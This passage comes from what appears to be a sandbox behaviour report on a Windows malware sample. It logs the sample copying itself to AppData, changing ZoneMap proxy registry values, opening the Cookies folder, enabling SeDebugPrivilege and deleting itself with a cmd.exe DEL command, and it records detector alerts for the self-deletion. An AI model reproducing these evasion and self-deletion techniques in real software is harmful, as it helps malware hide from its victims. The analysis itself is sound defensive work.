1433.          mode: failed
1434.          sequenceNumber: 96
1435.          value: C:\Windows\R38QI00A0M0\D77273J5H4B
1436.          processinfo:
1437.            pid: 2824
1438.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1439.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1440.            ads:
1441.          fid (ads:): 0
1442.          failure: open
1443.          ntstatus: 0xc000003a
1444.          CreateOptions: 0x200000
1445.        file:
1446.          timestamp: 34077
1447.          mode: failed
1448.          sequenceNumber: 97
1449.          value: C:\Windows\SysWOW64\wbem\R38QI00A0M0\D77273J5H4B
1450.          processinfo:
1451.            pid: 2824
1452.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1453.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1454.            ads:
1455.          fid (ads:): 0
1456.          failure: open
1457.          ntstatus: 0xc000003a
1458.          CreateOptions: 0x200000
1459.        file:
1460.          timestamp: 34082
1461.          mode: failed
1462.          sequenceNumber: 98
1463.          value: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\R38QI00A0M0\D77273J5H4B
1464.          processinfo:
1465.            pid: 2824
1466.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1467.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1468.            ads:
1469.          fid (ads:): 0
1470.          failure: open
1471.          ntstatus: 0xc000003a
1472.          CreateOptions: 0x200000
1473.        file:
1474.          timestamp: 34087
1475.          mode: failed
1476.          sequenceNumber: 99
1477.          value: C:\Program Files (x86)\QuickTime\QTSystem\R38QI00A0M0\D77273J5H4B
1478.          processinfo:
1479.            pid: 2824
1480.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1481.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1482.            ads:
1483.          fid (ads:): 0
1484.          failure: open
1485.          ntstatus: 0xc000003a
1486.          CreateOptions: 0x200000
1487.        file:
1488.          timestamp: 34092
1489.          mode: failed
1490.          sequenceNumber: 100
1491.          value: C:\Program Files (x86)\Debugging Tools for Windows (x86)\R38QI00A0M0\D77273J5H4B
1492.          processinfo:
1493.            pid: 2824
1494.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1495.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1496.            ads:
1497.          fid (ads:): 0
1498.          failure: open
1499.          ntstatus: 0xc000003a
1500.          CreateOptions: 0x200000
1501.        file:
1502.          timestamp: 34097
1503.          mode: failed
1504.          sequenceNumber: 101
1505.          value: C:\Program Files\Debugging Tools for Windows (x64)\R38QI00A0M0\D77273J5H4B
1506.          processinfo:
1507.            pid: 2824
1508.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1509.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1510.            ads:
1511.          fid (ads:): 0
1512.          failure: open
1513.          ntstatus: 0xc000003a
1514.          CreateOptions: 0x200000
1515.        apicall:
1516.          timestamp: 34109
1517.          sequenceNumber: 102
1518.          processinfo:
1519.            pid: 2824
1520.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1521.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1522.          dllname: user32.dll
1523.          apiname: EnumWindows
1524.          address: 0x00270eba
1525.          params:
1526.            param (id:1): 0x270e20
1527.            param (id:2): 0x18f5b8
1528.        apicall:
1529.          timestamp: 34110
1530.          sequenceNumber: 103
1531.          processinfo:
1532.            pid: 2824
1533.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1534.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1535.          dllname: kernel32.dll
1536.          apiname: Sleep
1537.          address: 0x002711cc
1538.          params:
1539.            param (id:1): 1100
1540.        file:
1541.          timestamp: 34120
1542.          mode: failed
1543.          sequenceNumber: 104
1544.          value: C:\Users\Administrator\AppData\Local\Temp\RPCRTREMOTE.DLL
1545.          processinfo:
1546.            tainted: true
1547.            pid: 2540
1548.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1549.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1550.            ads:
1551.          fid (ads:): 0
1552.          failure: open
1553.          ntstatus: 0xc0000034
1554.          CreateOptions: 0x200000
1555.          PE:
1556.            InspectionType: Ext
1557.        apicall:
1558.          timestamp: 34657
1559.          sequenceNumber: 105
1560.          processinfo:
1561.            pid: 2540
1562.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1563.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1564.          dllname: kernel32.dll
1565.          apiname: Sleep
1566.          address: 0x7760d98d
1567.          params:
1568.            param (id:1): 60000
1569.        file:
1570.          timestamp: 34666
1571.          mode: failed
1572.          sequenceNumber: 106
1573.          value: C:\Users\Administrator\AppData\Local\Temp\SECUR32.DLL
1574.          processinfo:
1575.            tainted: true
1576.            pid: 2540
1577.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1578.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1579.            ads:
1580.          fid (ads:): 0
1581.          failure: open
1582.          ntstatus: 0xc0000034
1583.          CreateOptions: 0x200000
1584.          PE:
1585.            InspectionType: Ext
1586.        mutex:
1587.          timestamp: 34673
1588.          sequenceNumber: 107
1589.          value: \Sessions\1\BaseNamedObjects\ZonesCacheCounterMutex
1590.          processinfo:
1591.            pid: 2540
1592.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1593.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1594.        regkey:
1595.          timestamp: 34673
1596.          mode: deleteval
1597.          sequenceNumber: 108
1598.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
1599.           processinfo:
1600.             pid: 2540
1601.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1602.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1603.         regkey:
1604.           timestamp: 34675
1605.           mode: deleteval
1606.           sequenceNumber: 109
1607.           value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
1608.          processinfo:
1609.            pid: 2540
1610.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1611.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1612.        regkey:
1613.          timestamp: 34675
1614.          mode: deleteval
1615.          sequenceNumber: 110
1616.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
1617.           processinfo:
1618.             pid: 2540
1619.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1620.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1621.         regkey:
1622.           timestamp: 34675
1623.           mode: deleteval
1624.           sequenceNumber: 111
1625.           value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
1626.          processinfo:
1627.            pid: 2540
1628.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1629.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1630.        regkey:
1631.          timestamp: 34675
1632.          mode: setval
1633.          sequenceNumber: 112
1634.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
1635.           processinfo:
1636.             pid: 2540
1637.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1638.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1639.         regkey:
1640.           timestamp: 34675
1641.           mode: setval
1642.           sequenceNumber: 113
1643.           value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
1644.          processinfo:
1645.            pid: 2540
1646.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1647.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1648.        mutex:
1649.          timestamp: 34675
1650.          sequenceNumber: 114
1651.          value: \Sessions\1\BaseNamedObjects\ZonesLockedCacheCounterMutex
1652.          processinfo:
1653.            pid: 2540
1654.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1655.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1656.        regkey:
1657.          timestamp: 34676
1658.          mode: deleteval
1659.          sequenceNumber: 115
1660.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
1661.           processinfo:
1662.             pid: 2540
1663.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1664.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1665.         regkey:
1666.           timestamp: 34676
1667.           mode: deleteval
1668.           sequenceNumber: 116
1669.           value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"ProxyBypass"
1670.          processinfo:
1671.            pid: 2540
1672.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1673.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1674.        regkey:
1675.          timestamp: 34676
1676.          mode: deleteval
1677.          sequenceNumber: 117
1678.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
1679.           processinfo:
1680.             pid: 2540
1681.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1682.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1683.         regkey:
1684.           timestamp: 34676
1685.           mode: deleteval
1686.           sequenceNumber: 118
1687.           value: \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"IntranetName"
1688.          processinfo:
1689.            pid: 2540
1690.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1691.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1692.        regkey:
1693.          timestamp: 34676
1694.          mode: setval
1695.          sequenceNumber: 119
1696.          value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"UNCAsIntranet" = 0x00000000
1697.           processinfo:
1698.             pid: 2540
1699.             imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1700.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1701.         regkey:
1702.           timestamp: 34676
1703.           mode: setval
1704.           sequenceNumber: 120
1705.           value: \REGISTRY\USER\S-1-5-21-2529703413-2662079939-3113469119-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\"AutoDetect" = 0x00000001
1706.          processinfo:
1707.            pid: 2540
1708.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1709.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1710.        folder:
1711.          timestamp: 34728
1712.          mode: open
1713.          sequenceNumber: 121
1714.          value: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies
1715.          processinfo:
1716.            pid: 2540
1717.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1718.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1719.          ntstatus: 0x0
1720.          CreateOptions: 0x200000
1721.        apicall:
1722.          timestamp: 34733
1723.          sequenceNumber: 122
1724.          processinfo:
1725.            pid: 2540
1726.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1727.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1728.          dllname: kernel32.dll
1729.          apiname: GetSystemDirectoryW
1730.          address: 0x77179cce
1731.          params:
1732.            param (id:1): 0x29ef6cc
1733.            param (id:2): 260
1734.        process:
1735.          timestamp: 34737
1736.          mode: started
1737.          sequenceNumber: 123
1738.          value: C:\Windows\SysWOW64\cmd.exe
1739.          pid: 2400
1740.          ppid: 2540
1741.          parentname: C:\Users\Administrator\AppData\Local\Temp\73.exe
1742.          cmdline: "C:\Windows\system32\cmd.exe" /c DEL C:\Users\ADMINI~1\AppData\Local\Temp\73.exe
1743.          filesize: 302592
1744.          md5sum: ad7b9c14083b52bc532fba5948342b98
1745.          sha1sum: ee8cbf12d87c4d388f09b4f69bed2e91682920b5
1746.            ads:
1747.          fid (ads:): 281474976780679
1748.        file:
1749.          timestamp: 34743
1750.          mode: failed
1751.          sequenceNumber: 124
1752.          value: C:\Windows\SysWOW64\UI\SWDRM.DLL
1753.          processinfo:
1754.            tainted: true
1755.            pid: 2540
1756.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
1757.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1758.            ads:
1759.          fid (ads:): 0
1760.          failure: open
1761.          ntstatus: 0xc000003a
1762.          CreateOptions: 0x200000
1763.          PE:
1764.            InspectionType: Ext
1765.        file:
1766.          timestamp: 34758
1767.          mode: failed
1768.          sequenceNumber: 125
1769.          value: C:\Windows\System32\WOW64LOG.DLL
1770.          processinfo:
1771.            tainted: true
1772.            pid: 2400
1773.            imagepath: C:\Windows\SysWOW64\cmd.exe
1774.            md5sum: ad7b9c14083b52bc532fba5948342b98
1775.            ads:
1776.          fid (ads:): 0
1777.          failure: open
1778.          ntstatus: 0xc0000034
1779.          CreateOptions: 0x200000
1780.          PE:
1781.            InspectionType: Ext
1782.        process:
1783.          timestamp: 34762
1784.          mode: terminated
1785.          sequenceNumber: 126
1786.          value: C:\Users\Administrator\AppData\Local\Temp\73.exe
1787.          pid: 2540
1788.          ppid: 2312
1789.          parentname: C:\Users\Administrator\AppData\Local\Temp\73.exe
1790.          cmdline: N/A
1791.            ads:
1792.          fid (ads:): 3377699720611042
1793.        regkey:
1794.          randomized: true
1795.          mode: queryvalue
1796.          sequenceNumber: 127
1797.          timestamp: 34834
1798.          value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
1799.           processinfo:
1800.             pid: 2400
1801.             imagepath: C:\Windows\SysWOW64\cmd.exe
1802.             md5sum: ad7b9c14083b52bc532fba5948342b98
1803.         file:
1804.           timestamp: 34864
1805.           mode: delete
1806.           sequenceNumber: 128
1807.           value: C:\Users\Administrator\AppData\Local\Temp\73.exe
1808.           filesize: 364544
1809.           md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1810.           sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
1811.           processinfo:
1812.             tainted: true
1813.             pid: 2400
1814.             imagepath: C:\Windows\SysWOW64\cmd.exe
1815.             md5sum: ad7b9c14083b52bc532fba5948342b98
1816.             ads:
1817.           fid (ads:): 3377699720611042
1818.           ntstatus: 0x0
1819.           CreateOptions: 0x0
1820.           PE:
1821.             InspectionType: Ext
1822.         malicious-alert:
1823.           classtype: Self-Delete
1824.           weight: 0
1825.           ruleid: 1712 : Self deletion using batch file ; Process deleting itself using a batch file
1826.           msg: Process deleting itself using a batch file
1827.           display-msg: Self deletion using batch file
1828.         malicious-alert:
1829.           classtype: Self-Delete
1830.           weight: 0
1831.           ruleid: 1701 : Root process deleted ; Process deleting itself
1832.           msg: Process deleting itself
1833.           display-msg: Root process deleted
1834.         process:
1835.           timestamp: 34873
1836.           mode: terminated
1837.           sequenceNumber: 129
1838.           value: C:\Windows\SysWOW64\cmd.exe
1839.           pid: 2400
1840.           ppid: 2540
1841.           parentname: C:\Users\Administrator\AppData\Local\Temp\73.exe
1842.           cmdline: N/A
1843.             ads:
1844.           fid (ads:): 281474976780679
1845.         process:
1846.           timestamp: 35056
1847.           mode: started
1848.           sequenceNumber: 130
1849.           value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1850.           pid: 1648
1851.           ppid: 2824
1852.           parentname: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1853.           cmdline: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1854.           filesize: 364544
1855.           md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1856.           sha1sum: 8d149bc90e10db7571379dc0e62409cdcfb7427c
1857.             ads:
1858.           fid (ads:): 3096224743903578
1859.         file:
1860.           timestamp: 35079
1861.           mode: failed
1862.           sequenceNumber: 131
1863.           value: C:\Windows\System32\WOW64LOG.DLL
1864.           processinfo:
1865.             tainted: true
1866.             pid: 1648
1867.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1868.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1869.             ads:
1870.           fid (ads:): 0
1871.           failure: open
1872.           ntstatus: 0xc0000034
1873.           CreateOptions: 0x200000
1874.           PE:
1875.             InspectionType: Ext
1876.         file:
1877.           timestamp: 35105
1878.           mode: failed
1879.           sequenceNumber: 132
1880.           value: C:\Users\Administrator\AppData\Roaming\MPR.DLL
1881.           processinfo:
1882.             tainted: true
1883.             pid: 1648
1884.             imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1885.             md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1886.             ads:
1887.           fid (ads:): 0
1888.           failure: open
1889.           ntstatus: 0xc0000034
1890.           CreateOptions: 0x200000
1891.           PE:
1892.             InspectionType: Ext
1893.         process:
1894.           timestamp: 35104
1895.           mode: terminated
1896.           sequenceNumber: 133
1897.           value: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1898.           pid: 2824
1899.           ppid: 2540
1900.           parentname: C:\Users\Administrator\AppData\Local\Temp\73.exe
1901.           cmdline: N/A
1902.             ads:
1903.           fid (ads:): 3096224743903578
1904.         regkey:
1905.           randomized: true
1906.           mode: queryvalue
1907.           sequenceNumber: 134
1908.           timestamp: 35115
1909.           value: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ActiveComputerName\"ComputerName"
1910.          processinfo:
1911.            pid: 1648
1912.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1913.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1914.        file:
1915.          timestamp: 35123
1916.          mode: failed
1917.          sequenceNumber: 135
1918.          value: C:\Windows\SysWOW64\RPCSS.DLL
1919.          processinfo:
1920.            tainted: true
1921.            pid: 1648
1922.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1923.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1924.            ads:
1925.          fid (ads:): 0
1926.          failure: open
1927.          ntstatus: 0xc0000034
1928.          CreateOptions: 0x200000
1929.          PE:
1930.            InspectionType: Ext
1931.        apicall:
1932.          timestamp: 35122
1933.          sequenceNumber: 136
1934.          processinfo:
1935.            pid: 1648
1936.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1937.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1938.          dllname: kernel32.dll
1939.          apiname: Sleep
1940.          address: 0x0042207d
1941.          params:
1942.            param (id:1): 15
1943.        apicall:
1944.          timestamp: 35126
1945.          sequenceNumber: 137
1946.          processinfo:
1947.            pid: 1648
1948.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1949.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1950.          dllname: kernel32.dll
1951.          apiname: Sleep
1952.          address: 0x0042207d
1953.          params:
1954.            param (id:1): 15
1955.        apicall:
1956.          timestamp: 35147
1957.          sequenceNumber: 138
1958.          processinfo:
1959.            pid: 1648
1960.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1961.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1962.          dllname: kernel32.dll
1963.          apiname: Sleep
1964.          address: 0x0042207d
1965.          params:
1966.            param (id:1): 15
1967.        apicall:
1968.          timestamp: 35153
1969.          sequenceNumber: 139
1970.          processinfo:
1971.            pid: 1648
1972.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1973.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1974.          dllname: kernel32.dll
1975.          apiname: Sleep
1976.          address: 0x0042207d
1977.          params:
1978.            param (id:1): 15
1979.        apicall:
1980.          timestamp: 35163
1981.          sequenceNumber: 140
1982.          processinfo:
1983.            pid: 1648
1984.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1985.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1986.          dllname: kernel32.dll
1987.          apiname: Sleep
1988.          address: 0x0042207d
1989.          params:
1990.            param (id:1): 15
1991.        apicall:
1992.          timestamp: 35178
1993.          sequenceNumber: 141
1994.          processinfo:
1995.            pid: 1648
1996.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
1997.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
1998.          dllname: kernel32.dll
1999.          apiname: Sleep
2000.          address: 0x0042207d
2001.          params:
2002.            param (id:1): 15
2003.        apicall:
2004.          timestamp: 35183
2005.          sequenceNumber: 142
2006.          processinfo:
2007.            pid: 1648
2008.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2009.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2010.          dllname: kernel32.dll
2011.          apiname: Sleep
2012.          address: 0x0042207d
2013.          params:
2014.            param (id:1): 15
2015.        apicall:
2016.          timestamp: 35208
2017.          sequenceNumber: 143
2018.          processinfo:
2019.            pid: 1648
2020.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2021.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2022.          dllname: kernel32.dll
2023.          apiname: Sleep
2024.          address: 0x0042207d
2025.          params:
2026.            param (id:1): 15
2027.        apicall:
2028.          timestamp: 35212
2029.          sequenceNumber: 144
2030.          processinfo:
2031.            pid: 1648
2032.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2033.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2034.          dllname: kernel32.dll
2035.          apiname: Sleep
2036.          address: 0x0042207d
2037.          params:
2038.            param (id:1): 15
2039.        apicall:
2040.          timestamp: 35226
2041.          sequenceNumber: 145
2042.          processinfo:
2043.            pid: 1648
2044.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2045.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2046.          dllname: kernel32.dll
2047.          apiname: GetSystemDirectoryW
2048.          address: 0x7732f96e
2049.          params:
2050.            param (id:1): 0x77396420
2051.            param (id:2): 260
2052.        mutex:
2053.          timestamp: 35227
2054.          sequenceNumber: 146
2055.          value: \Sessions\1\BaseNamedObjects\DBWinMutex
2056.          processinfo:
2057.            pid: 1648
2058.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2059.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2060.        mutex:
2061.          timestamp: 35234
2062.          sequenceNumber: 147
2063.          value: \Sessions\1\BaseNamedObjects\AMResourceMutex3
2064.          processinfo:
2065.            pid: 1648
2066.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2067.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2068.        file:
2069.          timestamp: 35242
2070.          mode: failed
2071.          sequenceNumber: 148
2072.          value: C:\Users\Administrator\AppData\Roaming\DWMAPI.DLL
2073.          processinfo:
2074.            tainted: true
2075.            pid: 1648
2076.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2077.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2078.            ads:
2079.          fid (ads:): 0
2080.          failure: open
2081.          ntstatus: 0xc0000034
2082.          CreateOptions: 0x200000
2083.          PE:
2084.            InspectionType: Ext
2085.        file:
2086.          timestamp: 35247
2087.          mode: failed
2088.          sequenceNumber: 149
2089.          value: C:\Users\Administrator\AppData\Roaming\MSVFW32.DLL
2090.          processinfo:
2091.            tainted: true
2092.            pid: 1648
2093.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2094.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2095.            ads:
2096.          fid (ads:): 0
2097.          failure: open
2098.          ntstatus: 0xc0000034
2099.          CreateOptions: 0x200000
2100.          PE:
2101.            InspectionType: Ext
2102.        file:
2103.          timestamp: 35257
2104.          mode: failed
2105.          sequenceNumber: 150
2106.          value: C:\Users\Administrator\AppData\Roaming\PROFAPI.DLL
2107.          processinfo:
2108.            tainted: true
2109.            pid: 1648
2110.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2111.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2112.            ads:
2113.          fid (ads:): 0
2114.          failure: open
2115.          ntstatus: 0xc0000034
2116.          CreateOptions: 0x200000
2117.          PE:
2118.            InspectionType: Ext
2119.        apicall:
2120.          timestamp: 35256
2121.          sequenceNumber: 151
2122.          processinfo:
2123.            pid: 1648
2124.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2125.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2126.          dllname: ntdll.dll
2127.          apiname: NtAdjustPrivilegesToken
2128.          address: 0x7584ca4f
2129.          params:
2130.            param (id:1): SeDebugPrivilege
2131.            param (id:2): Enabled
2132.        apicall:
2133.          timestamp: 35256
2134.          sequenceNumber: 152
2135.          processinfo:
2136.            pid: 1648
2137.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2138.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2139.          dllname: advapi32.dll
2140.          apiname: GetTokenInformation
2141.          address: 0x0041e684
2142.          params:
2143.            param (id:1): 0x1a0
2144.            param (id:2): 0x19
2145.        apicall:
2146.          timestamp: 35256
2147.          sequenceNumber: 153
2148.          processinfo:
2149.            pid: 1648
2150.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2151.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2152.          dllname: advapi32.dll
2153.          apiname: GetTokenInformation
2154.          address: 0x0041e6c6
2155.          params:
2156.            param (id:1): 0x1a0
2157.            param (id:2): 0x19
2158.        apicall:
2159.          timestamp: 35257
2160.          sequenceNumber: 154
2161.          processinfo:
2162.            pid: 1648
2163.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2164.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2165.          dllname: kernel32.dll
2166.          apiname: Sleep
2167.          address: 0x0042207d
2168.          params:
2169.            param (id:1): 15
2170.        apicall:
2171.          timestamp: 35266
2172.          sequenceNumber: 155
2173.          processinfo:
2174.            pid: 1648
2175.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2176.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2177.          dllname: kernel32.dll
2178.          apiname: Sleep
2179.          address: 0x0042207d
2180.          params:
2181.            param (id:1): 15
2182.        apicall:
2183.          timestamp: 35275
2184.          sequenceNumber: 156
2185.          processinfo:
2186.            pid: 1648
2187.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2188.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2189.          dllname: kernel32.dll
2190.          apiname: Sleep
2191.          address: 0x0042207d
2192.          params:
2193.            param (id:1): 15
2194.        apicall:
2195.          timestamp: 35288
2196.          sequenceNumber: 157
2197.          processinfo:
2198.            pid: 1648
2199.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2200.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2201.          dllname: kernel32.dll
2202.          apiname: Sleep
2203.          address: 0x0042207d
2204.          params:
2205.            param (id:1): 15
2206.        apicall:
2207.          timestamp: 35292
2208.          sequenceNumber: 158
2209.          processinfo:
2210.            pid: 1648
2211.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2212.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2213.          dllname: kernel32.dll
2214.          apiname: Sleep
2215.          address: 0x0042207d
2216.          params:
2217.            param (id:1): 15
2218.        mutex:
2219.          timestamp: 35349
2220.          sequenceNumber: 159
2221.          value: \Sessions\1\BaseNamedObjects\78456214324124
2222.          processinfo:
2223.            pid: 1648
2224.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2225.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2226.        file:
2227.          timestamp: 35354
2228.          mode: failed
2229.          sequenceNumber: 160
2230.          value: C:\Users\Administrator\AppData\Roaming\BCDEDIT.EXE
2231.          processinfo:
2232.            tainted: true
2233.            pid: 1648
2234.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2235.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2236.            ads:
2237.          fid (ads:): 0
2238.          failure: open
2239.          ntstatus: 0xc0000034
2240.          CreateOptions: 0x200000
2241.          PE:
2242.            InspectionType: Ext
2243.        file:
2244.          timestamp: 35359
2245.          mode: failed
2246.          sequenceNumber: 161
2247.          value: C:\Users\ADMINI~1\AppData\Local\Temp\bcdedit.exe
2248.          processinfo:
2249.            tainted: true
2250.            pid: 1648
2251.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
2252.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
2253.            ads:
2254.          fid (ads:): 0
2255.          failure: open
2256.          ntstatus: 0xc0000034
2257.          CreateOptions: 0x200000
2258.          PE:
2259.            InspectionType: Ext
2260.        process:
